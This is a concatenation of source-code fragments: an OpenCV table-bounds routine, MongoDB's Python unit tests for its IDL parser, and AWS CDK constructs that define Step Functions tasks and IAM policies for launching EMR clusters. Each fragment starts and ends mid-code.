if not type(lines).__module__ == "numpy":
return max_vertical
for line in lines:
for x1, y1, x2, y2 in line:
if x1 == x2:
while(self.image_object[y2, x2].tolist() != DEFAULT_PIXEL_COLOR and y2 > 0):
y2 -= 1
if y2 < max_vertical[min_vertical_index]:
max_vertical[min_vertical_index] = y2
return max_vertical
def get_horizontal_base_line(self, lines):
'''Gives vertical coordinate of horizontal base line(aka header line)
'''
horizontal_base_line = 0
for line in lines:
for x1, y1, x2, y2 in line:
if y1 == y2 and (horizontal_base_line == 0 or horizontal_base_line > y1):
horizontal_base_line = y1 + BUFFER_LENGTH
return horizontal_base_line
def get_table_bounds(self):
'''
Get best possible table bounds
'''
table_bounds = None
image_gray = cv2.cvtColor(self.image_object, cv2.COLOR_BGR2GRAY)
temp_image, contours, hierarchy = cv2.findContours(image_gray,
cv2.RETR_LIST,
cv2.CHAIN_APPROX_SIMPLE)
best_match_contour_index = None
max_contour_size = 0
count = 0
for contour in contours:
if cv2.contourArea(contour) > max_contour_size:
contour_size = cv2.contourArea(contour)
x, y, w, h = cv2.boundingRect(contour)
if x > 0 and y > 0 and contour_size > max_contour_size:
best_match_contour_index = count
max_contour_size = contour_size
count += 1
if best_match_contour_index:
x, y, w, h = cv2.boundingRect(contours[best_match_contour_index])
x = x - BUFFER_LENGTH
w = w + | |
<gh_stars>0
#!/usr/bin/env python3
#
# Copyright (C) 2018-present MongoDB, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the Server Side Public License, version 1,
# as published by MongoDB, Inc.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# Server Side Public License for more details.
#
# You should have received a copy of the Server Side Public License
# along with this program. If not, see
# <http://www.mongodb.com/licensing/server-side-public-license>.
#
# As a special exception, the copyright holders give permission to link the
# code of portions of this program with the OpenSSL library under certain
# conditions as described in each individual source file and distribute
# linked combinations including the program with the OpenSSL library. You
# must comply with the Server Side Public License in all respects for
# all of the code used other than as permitted herein. If you modify file(s)
# with this exception, you may extend this exception to your version of the
# file(s), but you are not obligated to do so. If you do not wish to do so,
# delete this exception statement from your version. If you delete this
# exception statement from all source files in the program, then also delete
# it in the license file.
#
"""Test cases for IDL parser."""
# pylint: disable=too-many-lines
import textwrap
import unittest
# import package so that it works regardless of whether we run as a module or file
if __package__ is None:
import sys
from os import path
sys.path.append(path.dirname(path.abspath(__file__)))
from context import idl
import testcase
else:
from .context import idl
from . import testcase
class TestParser(testcase.IDLTestcase):
# pylint: disable=too-many-public-methods
"""Test the IDL parser only."""
def test_empty(self):
# type: () -> None
"""Test an empty document works."""
self.assert_parse("")
def test_root_negative(self):
# type: () -> None
"""Test unknown root scalar fails."""
self.assert_parse_fail(
textwrap.dedent("""
fake:
cpp_namespace: 'foo'
"""), idl.errors.ERROR_ID_UNKNOWN_ROOT)
def test_global_positive(self):
# type: () -> None
"""Postive global tests."""
# cpp_namespace alone
self.assert_parse(textwrap.dedent("""
global:
cpp_namespace: 'foo'"""))
# cpp_includes scalar
self.assert_parse(textwrap.dedent("""
global:
cpp_includes: 'foo'"""))
# cpp_includes list
self.assert_parse(
textwrap.dedent("""
global:
cpp_includes:
- 'bar'
- 'foo'"""))
def test_global_negative(self):
# type: () -> None
"""Negative global tests."""
# Global is a scalar
self.assert_parse_fail(
textwrap.dedent("""
global: foo
"""), idl.errors.ERROR_ID_IS_NODE_TYPE)
# Duplicate globals
self.assert_parse_fail(
textwrap.dedent("""
global:
cpp_namespace: 'foo'
global:
cpp_namespace: 'bar'
"""), idl.errors.ERROR_ID_DUPLICATE_NODE)
# Duplicate cpp_namespace
self.assert_parse_fail(
textwrap.dedent("""
global:
cpp_namespace: 'foo'
cpp_namespace: 'foo'"""), idl.errors.ERROR_ID_DUPLICATE_NODE)
# Duplicate cpp_includes
self.assert_parse_fail(
textwrap.dedent("""
global:
cpp_includes: 'foo'
cpp_includes: 'foo'"""), idl.errors.ERROR_ID_DUPLICATE_NODE)
# cpp_namespace as a sequence
self.assert_parse_fail(
textwrap.dedent("""
global:
cpp_namespace:
- 'foo'
- 'bar'"""), idl.errors.ERROR_ID_IS_NODE_TYPE)
# cpp_namespace as a map
self.assert_parse_fail(
textwrap.dedent("""
global:
cpp_namespace:
name: 'foo'"""), idl.errors.ERROR_ID_IS_NODE_TYPE)
# cpp_includes as a map
self.assert_parse_fail(
textwrap.dedent("""
global:
cpp_includes:
inc1: 'foo'"""), idl.errors.ERROR_ID_IS_NODE_TYPE_SCALAR_OR_SEQUENCE)
# cpp_includes as a sequence of tuples
self.assert_parse_fail(
textwrap.dedent("""
global:
cpp_includes:
- inc1: 'foo'"""), idl.errors.ERROR_ID_IS_NODE_TYPE)
# Unknown scalar
self.assert_parse_fail(
textwrap.dedent("""
global:
bar: 'foo'
"""), idl.errors.ERROR_ID_UNKNOWN_NODE)
def test_type_positive(self):
# type: () -> None
"""Positive type test cases."""
# Test all positive fields works
self.assert_parse(
textwrap.dedent("""
types:
foo:
description: foo
cpp_type: foo
bson_serialization_type: foo
serializer: foo
deserializer: foo
default: foo
bindata_subtype: foo
"""))
# Test sequence of bson serialization types
self.assert_parse(
textwrap.dedent("""
types:
foo:
description: foo
cpp_type: foo
bson_serialization_type:
- foo
- bar
"""))
def test_type_negative(self):
# type: () -> None
"""Negative type test cases."""
# Test duplicate types
self.assert_parse_fail(
textwrap.dedent("""
types:
foo:
description: test
cpp_type: foo
bson_serialization_type: int
types:
bar:
description: test
cpp_type: foo
bson_serialization_type: int
"""), idl.errors.ERROR_ID_DUPLICATE_NODE)
# Test scalar fails
self.assert_parse_fail(
textwrap.dedent("""
types:
foo: 'bar'"""), idl.errors.ERROR_ID_IS_NODE_TYPE)
# Test unknown field
self.assert_parse_fail(
textwrap.dedent("""
types:
foo:
bogus: foo
description: test
cpp_type: foo
bson_serialization_type:
"""), idl.errors.ERROR_ID_UNKNOWN_NODE)
# test duplicate field
self.assert_parse_fail(
textwrap.dedent("""
types:
foo:
description: foo
description: test
cpp_type: foo
bson_serialization_type:
"""), idl.errors.ERROR_ID_DUPLICATE_NODE)
# test list instead of scalar
self.assert_parse_fail(
textwrap.dedent("""
types:
- foo:
"""), idl.errors.ERROR_ID_IS_NODE_TYPE, multiple=True)
# test list instead of scalar
self.assert_parse_fail(
textwrap.dedent("""
types:
foo:
- bar
"""), idl.errors.ERROR_ID_IS_NODE_TYPE, multiple=True)
# test map instead of scalar
self.assert_parse_fail(
textwrap.dedent("""
types:
foo:
description:
foo: bar
"""), idl.errors.ERROR_ID_IS_NODE_TYPE, multiple=True)
# test missing bson_serialization_type field
self.assert_parse_fail(
textwrap.dedent("""
types:
foo:
description: foo
cpp_type: foo
"""), idl.errors.ERROR_ID_MISSING_REQUIRED_FIELD)
# test missing cpp_type field
self.assert_parse_fail(
textwrap.dedent("""
types:
foo:
description: foo
bson_serialization_type: foo
"""), idl.errors.ERROR_ID_MISSING_REQUIRED_FIELD)
def test_struct_positive(self):
# type: () -> None
"""Positive struct test cases."""
# All fields with true for bools
self.assert_parse(
textwrap.dedent("""
structs:
foo:
description: foo
strict: true
immutable: true
inline_chained_structs: true
generate_comparison_operators: true
cpp_validator_func: funcName
fields:
foo: bar
"""))
# All fields with false for bools
self.assert_parse(
textwrap.dedent("""
structs:
foo:
description: foo
strict: false
immutable: false
inline_chained_structs: false
generate_comparison_operators: false
cpp_validator_func: funcName
fields:
foo: bar
"""))
# Missing fields
self.assert_parse(
textwrap.dedent("""
structs:
foo:
description: foo
strict: true
"""))
def test_struct_negative(self):
# type: () -> None
"""Negative struct test cases."""
# Struct as a scalar
self.assert_parse_fail(
textwrap.dedent("""
structs:
foo: foo
"""), idl.errors.ERROR_ID_IS_NODE_TYPE)
# unknown field
self.assert_parse_fail(
textwrap.dedent("""
structs:
foo:
description: foo
foo: bar
fields:
foo: bar
"""), idl.errors.ERROR_ID_UNKNOWN_NODE)
# strict is a bool
self.assert_parse_fail(
textwrap.dedent("""
structs:
foo:
description: foo
strict: bar
fields:
foo: bar
"""), idl.errors.ERROR_ID_IS_NODE_VALID_BOOL)
# immutable is a bool
self.assert_parse_fail(
textwrap.dedent("""
structs:
foo:
description: foo
immutable: bar
fields:
foo: bar
"""), idl.errors.ERROR_ID_IS_NODE_VALID_BOOL)
# inline_chained_structs is a bool
self.assert_parse_fail(
textwrap.dedent("""
structs:
foo:
description: foo
inline_chained_structs: bar
fields:
foo: bar
"""), idl.errors.ERROR_ID_IS_NODE_VALID_BOOL)
# generate_comparison_operators is a bool
self.assert_parse_fail(
textwrap.dedent("""
structs:
foo:
description: foo
generate_comparison_operators: bar
fields:
foo: bar
"""), idl.errors.ERROR_ID_IS_NODE_VALID_BOOL)
# cpp_name is not allowed
self.assert_parse_fail(
textwrap.dedent("""
structs:
foo:
description: foo
cpp_name: bar
fields:
foo: bar
"""), idl.errors.ERROR_ID_UNKNOWN_NODE)
def test_variant_positive(self):
# type: () -> None
"""Positive variant test cases."""
self.assert_parse(
textwrap.dedent("""
structs:
foo:
description: foo
fields:
my_variant_field1:
type:
variant: [int, string]
my_variant_field2:
type:
variant:
- string
- array<string>
- object
"""))
def test_variant_negative(self):
# type: () -> None
"""Negative variant test cases."""
self.assert_parse_fail(
textwrap.dedent("""
structs:
foo:
description: foo
fields:
my_variant_field:
type:
variant: {}
"""), idl.errors.ERROR_ID_IS_NODE_TYPE)
self.assert_parse_fail(
textwrap.dedent("""
structs:
foo:
description: foo
fields:
my_variant_field:
type:
variant: 1
"""), idl.errors.ERROR_ID_IS_NODE_TYPE)
self.assert_parse_fail(
textwrap.dedent("""
structs:
foo:
description: foo
fields:
my_variant_field:
type:
variant: []
unknown_option: true
"""), idl.errors.ERROR_ID_UNKNOWN_NODE)
self.assert_parse_fail(
textwrap.dedent("""
structs:
foo:
description: foo
fields:
my_variant_field:
type:
variant:
- string
- {variant: [string, int]}
"""), idl.errors.ERROR_ID_IS_NODE_TYPE)
self.assert_parse_fail(
textwrap.dedent("""
structs:
foo:
description: foo
generate_comparison_operators: true
fields:
my_variant_field:
type:
variant: [string, int]
"""), idl.errors.ERROR_ID_VARIANT_COMPARISON)
def test_field_positive(self):
# type: () -> None
"""Positive field test cases."""
# Test short types
self.assert_parse(
textwrap.dedent("""
structs:
foo:
description: foo
fields:
foo: short
"""))
# Test all fields
self.assert_parse(
textwrap.dedent("""
structs:
foo:
description: foo
fields:
foo:
type: foo
description: foo
optional: true
ignore: true
cpp_name: bar
comparison_order: 3
unstable: true
"""))
# Test false bools
self.assert_parse(
textwrap.dedent("""
structs:
foo:
description: foo
strict: false
fields:
foo:
type: string
optional: false
ignore: false
unstable: false
"""))
def test_field_negative(self):
# type: () -> None
"""Negative field test cases."""
# Test duplicate fields
self.assert_parse_fail(
textwrap.dedent("""
structs:
foo:
description: foo
strict: false
fields:
foo: short
foo: int
"""), idl.errors.ERROR_ID_DUPLICATE_NODE)
# Test bad bool
self.assert_parse_fail(
textwrap.dedent("""
structs:
foo:
description: foo
strict: false
fields:
foo:
type: string
optional: bar
"""), idl.errors.ERROR_ID_IS_NODE_VALID_BOOL)
# Test bad bool
self.assert_parse_fail(
textwrap.dedent("""
structs:
foo:
description: foo
strict: false
fields:
foo:
type: string
ignore: bar
"""), idl.errors.ERROR_ID_IS_NODE_VALID_BOOL)
# Test bad int scalar
self.assert_parse_fail(
textwrap.dedent("""
structs:
foo:
description: foo
strict: false
fields:
foo:
type: string
comparison_order:
- a
- b
"""), idl.errors.ERROR_ID_IS_NODE_TYPE)
# Test bad int
self.assert_parse_fail(
textwrap.dedent("""
structs:
foo:
description: foo
strict: false
fields:
foo:
type: string
comparison_order: 3.14159
"""), idl.errors.ERROR_ID_IS_NODE_VALID_INT)
# Test bad negative int
self.assert_parse_fail(
textwrap.dedent("""
structs:
foo:
description: foo
strict: false
fields:
foo:
type: string
comparison_order: -1
"""), idl.errors.ERROR_ID_IS_NODE_VALID_NON_NEGATIVE_INT)
def test_name_collisions_negative(self):
# type: () -> None
"""Negative tests for type collisions."""
# Struct after type
self.assert_parse_fail(
textwrap.dedent("""
types:
foo1:
description: foo
cpp_type: foo
bson_serialization_type: string
serializer: foo
deserializer: foo
default: foo
structs:
foo1:
description: foo
strict: true
fields:
foo: string
"""), idl.errors.ERROR_ID_DUPLICATE_SYMBOL)
# Type after struct
self.assert_parse_fail(
textwrap.dedent("""
structs:
foo1:
description: foo
strict: true
fields:
foo: string
types:
foo1:
description: foo
cpp_type: foo
bson_serialization_type: string
serializer: foo
deserializer: foo
| |
from typing import Any, Dict, List, Mapping, Optional
from aws_cdk import aws_events as events
from aws_cdk import aws_iam as iam
from aws_cdk import aws_lambda
from aws_cdk import aws_secretsmanager as secretsmanager
from aws_cdk import aws_stepfunctions as sfn
from aws_cdk import aws_stepfunctions_tasks as sfn_tasks
from aws_cdk import core
from aws_emr_launch.constructs.base import BaseBuilder
from aws_emr_launch.constructs.emr_constructs import emr_code
from aws_emr_launch.constructs.iam_roles import emr_roles
from aws_emr_launch.constructs.lambdas import emr_lambdas
class BaseTask(sfn.TaskStateBase):
def __init__(self, scope: core.Construct, id: str, *,
comment: Optional[str] = None,
heartbeat: Optional[core.Duration] = None,
input_path: Optional[str] = None,
integration_pattern: Optional[sfn.IntegrationPattern] = None,
output_path: Optional[str] = None,
result_path: Optional[str] = None,
timeout: Optional[core.Duration] = None,):
super().__init__(
scope, id,
comment=comment,
heartbeat=heartbeat,
input_path=input_path,
integration_pattern=integration_pattern,
output_path=output_path,
result_path=result_path,
timeout=timeout)
self._heartbeat = heartbeat
self._timeout = timeout
@staticmethod
def get_resource_arn(
service: str, api: str,
integration_pattern: Optional[sfn.IntegrationPattern] = sfn.IntegrationPattern.RUN_JOB) -> str:
if not service or not api:
raise ValueError('Both "service" and "api" are required to build the resource ARN')
resource_arn_suffixes = {
sfn.IntegrationPattern.REQUEST_RESPONSE: '',
sfn.IntegrationPattern.RUN_JOB: '.sync',
sfn.IntegrationPattern.WAIT_FOR_TASK_TOKEN: '.waitForTaskToken'
}
return f'arn:{core.Aws.PARTITION}:states:::{service}:{api}{resource_arn_suffixes[integration_pattern]}'
@staticmethod
def render_json_path(json_path: str) -> str:
if json_path is None:
return None
elif json_path == sfn.JsonPath.DISCARD:
return None
if not json_path.startswith('$'):
raise ValueError(f"Expected JSON path to start with '$', got: {json_path}")
return json_path
def _render_task_base(self) -> Mapping[Any, Any]:
task = {
'Type': 'Task',
'Comment': self._comment,
'TimeoutSeconds': self._timeout.to_seconds() if self._timeout else None,
'HeartbeatSeconds': self._heartbeat.to_seconds() if self._heartbeat else None,
'InputPath': self.render_json_path(self._input_path),
'OutputPath': self.render_json_path(self._output_path),
'ResultPath': self.render_json_path(self._result_path),
}
return {k: v for k, v in task.items() if v is not None}
def _when_bound_to_graph(self, graph: sfn.StateGraph) -> None:
super()._when_bound_to_graph(graph)
for policy_statement in self._task_policies():
graph.register_policy_statement(policy_statement)
class StartExecutionTask(BaseTask):
def __init__(self, scope: core.Construct, id: str, *,
comment: Optional[str] = None,
heartbeat: Optional[core.Duration] = None,
input_path: Optional[str] = None,
integration_pattern: Optional[sfn.IntegrationPattern] = sfn.IntegrationPattern.RUN_JOB,
output_path: Optional[str] = None,
result_path: Optional[str] = None,
timeout: Optional[core.Duration] = None,
state_machine: sfn.StateMachine,
input: Optional[Dict[str, any]] = None, name: Optional[str] = None,):
super().__init__(scope, id,
comment=comment,
heartbeat=heartbeat,
input_path=input_path,
integration_pattern=integration_pattern,
output_path=output_path,
result_path=result_path,
timeout=timeout)
self._state_machine = state_machine
self._input = input
self._name = name
self._integration_pattern = integration_pattern
self._metrics = None
self._statements = self._create_policy_statements()
def _create_policy_statements(self) -> List[iam.PolicyStatement]:
stack = core.Stack.of(self)
policy_statements = list()
policy_statements.append(
iam.PolicyStatement(
effect=iam.Effect.ALLOW,
actions=['states:StartExecution'],
resources=[self._state_machine.state_machine_arn]
)
)
if self._integration_pattern == sfn.IntegrationPattern.RUN_JOB:
policy_statements.append(
iam.PolicyStatement(
effect=iam.Effect.ALLOW,
actions=['states:DescribeExecution', 'states:StopExecution'],
resources=['*']
)
)
policy_statements.append(
iam.PolicyStatement(
effect=iam.Effect.ALLOW,
actions=['events:PutTargets', 'events:PutRule', 'events:DescribeRule'],
resources=[stack.format_arn(
service='events',
resource='rule',
resource_name='StepFunctionsGetEventsForStepFunctionsExecutionRule'
)]
)
)
return policy_statements
def _task_metrics(self) -> Optional[sfn.TaskMetricsConfig]:
return self._metrics
def _task_policies(self) -> List[iam.PolicyStatement]:
return self._statements
def to_state_json(self) -> Mapping[Any, Any]:
input = self._input if self._input is not None else sfn.TaskInput.from_context_at('$$.Execution.Input').value
task = {
'Resource': self.get_resource_arn('states', 'startExecution', self._integration_pattern),
'Parameters': sfn.FieldUtils.render_object({
'StateMachineArn': self._state_machine.state_machine_arn,
'Input': input,
'Name': self._name
}),
}
task.update(self._render_next_end())
task.update(self._render_retry_catch())
task.update(self._render_task_base())
return task
class EmrCreateClusterTask(BaseTask):
def __init__(self, scope: core.Construct, id: str, *,
comment: Optional[str] = None,
heartbeat: Optional[core.Duration] = None,
input_path: Optional[str] = None,
integration_pattern: Optional[sfn.IntegrationPattern] = sfn.IntegrationPattern.RUN_JOB,
output_path: Optional[str] = None,
result_path: Optional[str] = None,
timeout: Optional[core.Duration] = None,
roles: emr_roles.EMRRoles,):
super().__init__(scope, id,
comment=comment,
heartbeat=heartbeat,
input_path=input_path,
integration_pattern=integration_pattern,
output_path=output_path,
result_path=result_path,
timeout=timeout)
self._roles = roles
self._integration_pattern = integration_pattern
self._metrics = None
self._statements = self._create_policy_statements()
def _create_policy_statements(self) -> List[iam.PolicyStatement]:
stack = core.Stack.of(self)
policy_statements = list()
policy_statements.append(
iam.PolicyStatement(
actions=[
'elasticmapreduce:RunJobFlow',
'elasticmapreduce:DescribeCluster',
'elasticmapreduce:TerminateJobFlows'
],
resources=['*']
)
)
policy_statements.append(
iam.PolicyStatement(
actions=['iam:PassRole'],
resources=[
self._roles.service_role.role_arn,
self._roles.instance_role.role_arn,
self._roles.autoscaling_role.role_arn
]
)
)
if self._integration_pattern == sfn.IntegrationPattern.RUN_JOB:
policy_statements.append(
iam.PolicyStatement(
actions=['events:PutTargets', 'events:PutRule', 'events:DescribeRule'],
resources=[stack.format_arn(
service='events',
resource='rule',
resource_name='StepFunctionsGetEventForEMRRunJobFlowRule'
)]
)
)
return policy_statements
def _task_metrics(self) -> Optional[sfn.TaskMetricsConfig]:
return self._metrics
def _task_policies(self) -> List[iam.PolicyStatement]:
return self._statements
def to_state_json(self) -> Mapping[Any, Any]:
task = {
'Resource': self.get_resource_arn('elasticmapreduce', 'createCluster', self._integration_pattern),
'Parameters': sfn.FieldUtils.render_object({
'AdditionalInfo': sfn.TaskInput.from_data_at(
'$.AdditionalInfo').value,
'AmiVersion': sfn.TaskInput.from_data_at(
'$.AmiVersion').value,
'Applications': sfn.TaskInput.from_data_at(
'$.Applications').value,
'AutoScalingRole': sfn.TaskInput.from_data_at(
'$.AutoScalingRole').value,
'BootstrapActions': sfn.TaskInput.from_data_at(
'$.BootstrapActions').value,
'Configurations': sfn.TaskInput.from_data_at(
'$.Configurations').value,
'CustomAmiId': sfn.TaskInput.from_data_at(
'$.CustomAmiId').value,
'EbsRootVolumeSize': sfn.TaskInput.from_data_at(
'$.EbsRootVolumeSize').value,
'Instances': {
'AdditionalMasterSecurityGroups': sfn.TaskInput.from_data_at(
'$.Instances.AdditionalMasterSecurityGroups').value,
'AdditionalSlaveSecurityGroups': sfn.TaskInput.from_data_at(
'$.Instances.AdditionalSlaveSecurityGroups').value,
'Ec2KeyName': sfn.TaskInput.from_data_at(
'$.Instances.Ec2KeyName').value,
'Ec2SubnetId': sfn.TaskInput.from_data_at(
'$.Instances.Ec2SubnetId').value,
'Ec2SubnetIds': sfn.TaskInput.from_data_at(
'$.Instances.Ec2SubnetIds').value,
'EmrManagedMasterSecurityGroup': sfn.TaskInput.from_data_at(
'$.Instances.EmrManagedMasterSecurityGroup').value,
'EmrManagedSlaveSecurityGroup': sfn.TaskInput.from_data_at(
'$.Instances.EmrManagedSlaveSecurityGroup').value,
'HadoopVersion': sfn.TaskInput.from_data_at(
'$.Instances.HadoopVersion').value,
'InstanceCount': sfn.TaskInput.from_data_at(
'$.Instances.InstanceCount').value,
'InstanceFleets': sfn.TaskInput.from_data_at(
'$.Instances.InstanceFleets').value,
'InstanceGroups': sfn.TaskInput.from_data_at(
'$.Instances.InstanceGroups').value,
'KeepJobFlowAliveWhenNoSteps': True,
'MasterInstanceType': sfn.TaskInput.from_data_at(
'$.Instances.MasterInstanceType').value,
'Placement': sfn.TaskInput.from_data_at(
'$.Instances.Placement').value,
'ServiceAccessSecurityGroup': sfn.TaskInput.from_data_at(
'$.Instances.ServiceAccessSecurityGroup').value,
'SlaveInstanceType': sfn.TaskInput.from_data_at(
'$.Instances.SlaveInstanceType').value,
'TerminationProtected': sfn.TaskInput.from_data_at(
'$.Instances.TerminationProtected').value,
},
'JobFlowRole': sfn.TaskInput.from_data_at(
'$.JobFlowRole').value,
'KerberosAttributes': sfn.TaskInput.from_data_at(
'$.KerberosAttributes').value,
'LogUri': sfn.TaskInput.from_data_at(
'$.LogUri').value,
'ManagedScalingPolicy': sfn.TaskInput.from_data_at(
'$.ManagedScalingPolicy').value,
'Name': sfn.TaskInput.from_data_at(
'$.Name').value,
'NewSupportedProducts': sfn.TaskInput.from_data_at(
'$.NewSupportedProducts').value,
'ReleaseLabel': sfn.TaskInput.from_data_at(
'$.ReleaseLabel').value,
'RepoUpgradeOnBoot': sfn.TaskInput.from_data_at(
'$.RepoUpgradeOnBoot').value,
'ScaleDownBehavior': sfn.TaskInput.from_data_at(
'$.ScaleDownBehavior').value,
'SecurityConfiguration': sfn.TaskInput.from_data_at(
'$.SecurityConfiguration').value,
'ServiceRole': sfn.TaskInput.from_data_at(
'$.ServiceRole').value,
'StepConcurrencyLevel': sfn.TaskInput.from_data_at(
'$.StepConcurrencyLevel').value,
'SupportedProducts': sfn.TaskInput.from_data_at(
'$.SupportedProducts').value,
'Tags': sfn.TaskInput.from_data_at(
'$.Tags').value,
'VisibleToAllUsers': sfn.TaskInput.from_data_at(
'$.VisibleToAllUsers').value,
}),
}
task.update(self._render_next_end())
task.update(self._render_retry_catch())
task.update(self._render_task_base())
return task
class EmrAddStepTask(BaseTask):
def __init__(self, scope: core.Construct, id: str, *,
comment: Optional[str] = None,
heartbeat: Optional[core.Duration] = None,
input_path: Optional[str] = None,
integration_pattern: Optional[sfn.IntegrationPattern] = sfn.IntegrationPattern.RUN_JOB,
output_path: Optional[str] = None,
result_path: Optional[str] = None,
timeout: Optional[core.Duration] = None,
cluster_id: str, step: Dict[str, any],):
super().__init__(scope, id,
comment=comment,
heartbeat=heartbeat,
input_path=input_path,
integration_pattern=integration_pattern,
output_path=output_path,
result_path=result_path,
timeout=timeout)
self._cluster_id = cluster_id
self._step = step
self._integration_pattern = integration_pattern
self._metrics = None
self._statements = self._create_policy_statements()
def _create_policy_statements(self) -> List[iam.PolicyStatement]:
stack = core.Stack.of(self)
policy_statements = list()
policy_statements.append(
iam.PolicyStatement(
effect=iam.Effect.ALLOW,
actions=[
'elasticmapreduce:AddJobFlowSteps',
'elasticmapreduce:DescribeStep',
'elasticmapreduce:CancelSteps'
],
resources=[f'arn:aws:elasticmapreduce:{core.Aws.REGION}:{core.Aws.ACCOUNT_ID}:cluster/*']
)
)
if self._integration_pattern == sfn.IntegrationPattern.RUN_JOB:
policy_statements.append(
iam.PolicyStatement(
effect=iam.Effect.ALLOW,
actions=['events:PutTargets', 'events:PutRule', 'events:DescribeRule'],
resources=[stack.format_arn(
service='events',
resource='rule',
resource_name='StepFunctionsGetEventForEMRAddJobFlowStepsRule'
)]
)
)
return policy_statements
def _task_metrics(self) -> Optional[sfn.TaskMetricsConfig]:
return self._metrics
def _task_policies(self) -> List[iam.PolicyStatement]:
return self._statements
def to_state_json(self) -> Mapping[Any, Any]:
task = {
'Resource': self.get_resource_arn('elasticmapreduce', 'addStep', self._integration_pattern),
'Parameters': sfn.FieldUtils.render_object({
'ClusterId': self._cluster_id,
'Step': self._step
}),
}
task.update(self._render_next_end())
task.update(self._render_retry_catch())
task.update(self._render_task_base())
return task
class LoadClusterConfigurationBuilder:
@staticmethod
def build(scope: core.Construct, id: str, *,
cluster_name: str,
cluster_tags: List[core.Tag],
profile_namespace: str,
profile_name: str,
configuration_namespace: str,
configuration_name: str,
output_path: Optional[str] = None,
result_path: Optional[str] = None) -> sfn.Task:
# We use a nested Construct to avoid collisions with Lambda and Task ids
construct = core.Construct(scope, id)
load_cluster_configuration_lambda = emr_lambdas.LoadClusterConfigurationBuilder.build(
construct,
profile_namespace=profile_namespace,
profile_name=profile_name,
configuration_namespace=configuration_namespace,
configuration_name=configuration_name)
return sfn_tasks.LambdaInvoke(
construct, 'Load Cluster Configuration',
output_path=output_path,
result_path=result_path,
lambda_function=load_cluster_configuration_lambda,
payload_response_only=True,
payload=sfn.TaskInput.from_object({
'ClusterName': cluster_name,
'ClusterTags': [{'Key': t.key, 'Value': t.value} for t in cluster_tags],
'ProfileNamespace': profile_namespace,
'ProfileName': profile_name,
'ConfigurationNamespace': configuration_namespace,
'ConfigurationName': configuration_name,
}),
)
class OverrideClusterConfigsBuilder:
@staticmethod
def build(scope: core.Construct, id: str, *,
override_cluster_configs_lambda: Optional[aws_lambda.Function] = None,
allowed_cluster_config_overrides: Optional[Dict[str, str]] = None,
input_path: str = '$',
output_path: Optional[str] = None,
result_path: Optional[str] = None) -> sfn.Task:
# We use a nested Construct to avoid collisions with Lambda and Task ids
construct = core.Construct(scope, id)
override_cluster_configs_lambda = \
emr_lambdas.OverrideClusterConfigsBuilder.get_or_build(construct) \
if override_cluster_configs_lambda is None \
else override_cluster_configs_lambda
return sfn_tasks.LambdaInvoke(
construct, 'Override Cluster Configs',
output_path=output_path,
result_path=result_path,
lambda_function=override_cluster_configs_lambda,
payload_response_only=True,
payload=sfn.TaskInput.from_object({
'ExecutionInput': sfn.TaskInput.from_context_at('$$.Execution.Input').value,
'Input': sfn.TaskInput.from_data_at(input_path).value,
'AllowedClusterConfigOverrides': allowed_cluster_config_overrides
}),
)
class FailIfClusterRunningBuilder:
@staticmethod
def build(scope: core.Construct, id: str, *,
default_fail_if_cluster_running: bool,
input_path: str = '$',
output_path: Optional[str] = None,
result_path: Optional[str] = None) -> sfn.Task:
# We use a nested Construct to avoid collisions with Lambda and Task ids
construct = core.Construct(scope, id)
fail_if_cluster_running_lambda = emr_lambdas.FailIfClusterRunningBuilder.get_or_build(construct)
return sfn_tasks.LambdaInvoke(
construct, 'Fail If Cluster Running',
output_path=output_path,
result_path=result_path,
lambda_function=fail_if_cluster_running_lambda,
payload_response_only=True,
payload=sfn.TaskInput.from_object({
'ExecutionInput': sfn.TaskInput.from_context_at('$$.Execution.Input').value,
'DefaultFailIfClusterRunning': default_fail_if_cluster_running,
'Input': sfn.TaskInput.from_data_at(input_path).value
}),
)
class UpdateClusterTagsBuilder:
@staticmethod
def build(scope: core.Construct, id: str, *,
input_path: str = '$',
output_path: Optional[str] = None,
result_path: Optional[str] = None) -> sfn.Task:
# We use a nested Construct to avoid collisions with Lambda and Task ids
construct = core.Construct(scope, id)
update_cluster_tags_lambda = emr_lambdas.UpdateClusterTagsBuilder.get_or_build(construct)
return sfn_tasks.LambdaInvoke(
construct, 'Update Cluster Tags',
output_path=output_path,
result_path=result_path,
lambda_function=update_cluster_tags_lambda,
payload_response_only=True,
payload=sfn.TaskInput.from_object({
'ExecutionInput': sfn.TaskInput.from_context_at('$$.Execution.Input').value,
'Input': sfn.TaskInput.from_data_at(input_path).value
}),
)
class CreateClusterBuilder:
@staticmethod
def build(scope: core.Construct, id: str, *,
roles: emr_roles.EMRRoles,
input_path: str = '$',
result_path: Optional[str] = None,
output_path: Optional[str] = None,
wait_for_cluster_start: bool = True) -> sfn.Task:
# We use a nested Construct to avoid collisions with Lambda and Task ids
construct = core.Construct(scope, id)
integration_pattern = sfn.IntegrationPattern.RUN_JOB if wait_for_cluster_start \
else sfn.IntegrationPattern.REQUEST_RESPONSE
return EmrCreateClusterTask(
construct, 'Start EMR Cluster',
output_path=output_path,
result_path=result_path,
roles=roles,
input_path=input_path,
integration_pattern=integration_pattern,
)
class RunJobFlowBuilder(BaseBuilder):
@staticmethod
def build(scope: core.Construct, id: str, *, roles: emr_roles.EMRRoles,
kerberos_attributes_secret: Optional[secretsmanager.Secret] = None,
secret_configurations: Optional[Dict[str, secretsmanager.Secret]] = None,
input_path: str = '$',
result_path: Optional[str] = None,
output_path: Optional[str] = None,
wait_for_cluster_start: bool = True) -> sfn.Task:
# We use a nested Construct to avoid collisions with Lambda and Task ids
construct = core.Construct(scope, id)
event_rule = core.Stack.of(scope).node.try_find_child('EventRule')
if event_rule is None:
event_rule = events.Rule(
construct, 'EventRule',
enabled=False,
schedule=events.Schedule.rate(core.Duration.minutes(1)))
BaseBuilder.tag_construct(event_rule)
run_job_flow_lambda = emr_lambdas.RunJobFlowBuilder.get_or_build(construct, roles, event_rule)
check_cluster_status_lambda = emr_lambdas.CheckClusterStatusBuilder.get_or_build(construct, event_rule)
if kerberos_attributes_secret:
run_job_flow_lambda.add_to_role_policy(iam.PolicyStatement(
effect=iam.Effect.ALLOW,
actions=['secretsmanager:GetSecretValue'],
resources=[f'{kerberos_attributes_secret.secret_arn}*']
))
if secret_configurations is not None:
for secret in secret_configurations.values():
run_job_flow_lambda.add_to_role_policy(iam.PolicyStatement(
effect=iam.Effect.ALLOW,
